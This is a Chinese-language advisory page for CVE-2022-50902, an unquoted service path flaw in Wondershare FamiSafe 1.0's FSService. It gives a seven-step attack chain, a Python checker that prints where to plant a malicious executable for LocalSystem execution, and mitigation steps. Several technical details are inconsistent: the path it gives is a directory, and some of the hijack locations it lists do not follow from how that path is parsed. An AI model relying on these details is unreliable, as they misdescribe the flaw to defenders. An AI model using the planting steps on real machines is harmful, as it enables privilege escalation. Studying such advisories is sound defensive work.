CVE-2022-50902: Wondershare FamiSafe FSService未引用服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50902

漏洞类型

未引用服务路径漏洞

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wondershare FamiSafe 1.0

漏洞概述

CVE-2022-50902是Wondershare FamiSafe 1.0版本中存在的一个高危本地权限提升漏洞。该漏洞源于FSService服务使用未加引号的服务路径，导致攻击者可以通过路径劫持技术在服务启动时以LocalSystem最高权限执行任意恶意代码。漏洞位于C:\Program Files (x86)\Wondershare\FamiSafe\目录下，由于路径中存在空格且未被正确引用，Windows服务在解析路径时会从空格处截断并尝试执行路径前缀对应的程序。攻击者只需将恶意可执行文件放置在适当位置，即可在服务重启或系统启动时自动获得系统最高权限，成功实现权限提升。该漏洞CVSS评分高达8.4，属于高危级别，对系统安全构成严重威胁。攻击者利用此漏洞可以从普通用户权限提升至LocalSystem管理员权限，完全控制受害主机。

技术细节

未引用服务路径（Unquoted Service Path）漏洞是Windows环境中常见的一种权限提升技术。当Windows服务配置的服务路径包含空格且未使用引号包裹时，服务控制管理器（SCM）在解析路径时会从左到右匹配可执行文件。攻击者利用这一特性，将恶意可执行文件放置在路径的某个中间目录中，即可被服务加载执行。对于Wondershare FamiSafe的FSService服务，其路径为C:\Program Files (x86)\Wondershare\FamiSafe\，由于Program和Files之间存在空格且路径未被引号包裹，Windows会首先尝试执行C:\Program.exe。如果该文件不存在，则尝试执行C:\Program Files\FamiSafe.exe。攻击者可以利用这种路径解析行为，在C:\目录下放置名为Program.exe的恶意文件，或在C:\Program Files\下放置FamiSafe.exe，从而在FSService服务启动时以LocalSystem权限执行恶意代码。由于FSService是系统级服务，其启动权限为最高级别的LocalSystem，攻击成功后将获得完全的系统控制权。

攻击链分析

STEP 1

1

信息收集：攻击者首先识别目标系统上安装的Wondershare FamiSafe软件，并确认FSService服务存在

STEP 2

2

漏洞验证：使用sc qc FSService命令查询服务配置，确认BINARY_PATH_NAME包含空格且未被引号包裹

STEP 3

3

路径分析：分析服务路径C:\Program Files (x86)\Wondershare\FamiSafe\，识别可被劫持的中间路径位置

STEP 4

4

恶意文件创建：攻击者创建恶意可执行文件（如Program.exe），包含反弹shell、添加后门或执行任意命令的代码

STEP 5

5

文件部署：将恶意可执行文件放置在路径中的适当位置，如C:\Program.exe或C:\Program Files\FamiSafe.exe

STEP 6

6

触发执行：等待FSService服务重启或系统重启，Windows SCM将按顺序查找并执行路径前缀下的可执行文件

STEP 7

7

权限获取：恶意代码以LocalSystem最高权限执行，攻击者成功获得系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2022-50902 PoC - Wondershare FamiSafe FSService Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Wondershare FamiSafe

import os
import sys
import subprocess

def check_vulnerability():
    """Check if the target system is vulnerable to CVE-2022-50902"""
    try:
        # Query the FSService using WMIC or sc command
        result = subprocess.run(
            ['sc', 'qc', 'FSService'],
            capture_output=True,
            text=True
        )
        
        if 'BINARY_PATH_NAME' in result.stdout:
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    # Check if path contains spaces and is not quoted
                    if ' ' in path and not (path.startswith('"') and path.endswith('"')):
                        print(f"[+] VULNERABLE: Unquoted path detected: {path}")
                        print(f"[+] Attack vector: Place malicious executable in intermediate path")
                        return True
                    else:
                        print(f"[-] NOT VULNERABLE: Path is properly quoted")
                        return False
        return False
    except Exception as e:
        print(f"[-] Error checking vulnerability: {e}")
        return False

def exploit():
    """Generate exploit payload location"""
    vulnerable_path = r"C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe"
    
    print("\n[*] Exploitation steps for CVE-2022-50902:")
    print("=" * 60)
    print("1. Create malicious executable (e.g., Program.exe)")
    print(f"2. Place it at: C:\\Program.exe")
    print("3. Wait for service restart or system reboot")
    print("4. Malicious code will execute with LocalSystem privileges")
    print("\n[*] Potential injection points:")
    print("   - C:\\Program.exe (before 'Program Files')")
    print("   - C:\\Program Files\\FamiSafe.exe (before 'Wondershare')")
    print("   - C:\\Program Files (x86)\\Wondershare.exe (before 'Wondershare')")
    print("=" * 60)

if __name__ == "__main__":
    print("CVE-2022-50902 - Wondershare FamiSafe FSService Unquoted Service Path")
    print("=" * 70)
    
    if os.name == 'nt':
        if check_vulnerability():
            exploit()
        else:
            print("\n[-] Target is not vulnerable to this CVE")
    else:
        print("[-] This exploit only works on Windows systems")

影响范围

Wondershare FamiSafe 1.0

防御指南

临时缓解措施

在官方修复发布之前，可采取以下临时缓解措施：1）使用icacls命令限制FamiSafe安装目录及中间路径的写入权限，将C:\根目录和C:\Program Files等目录设置为仅管理员可写；2）使用Windows内置工具（如sc config）临时修改服务配置，将BINARY_PATH_NAME参数用引号包裹；3）部署端点检测与响应（EDR）解决方案，监控FSService服务相关的异常进程创建行为；4）考虑暂时禁用FSService服务，如果该服务非业务必需，但需评估对应用程序功能的影响。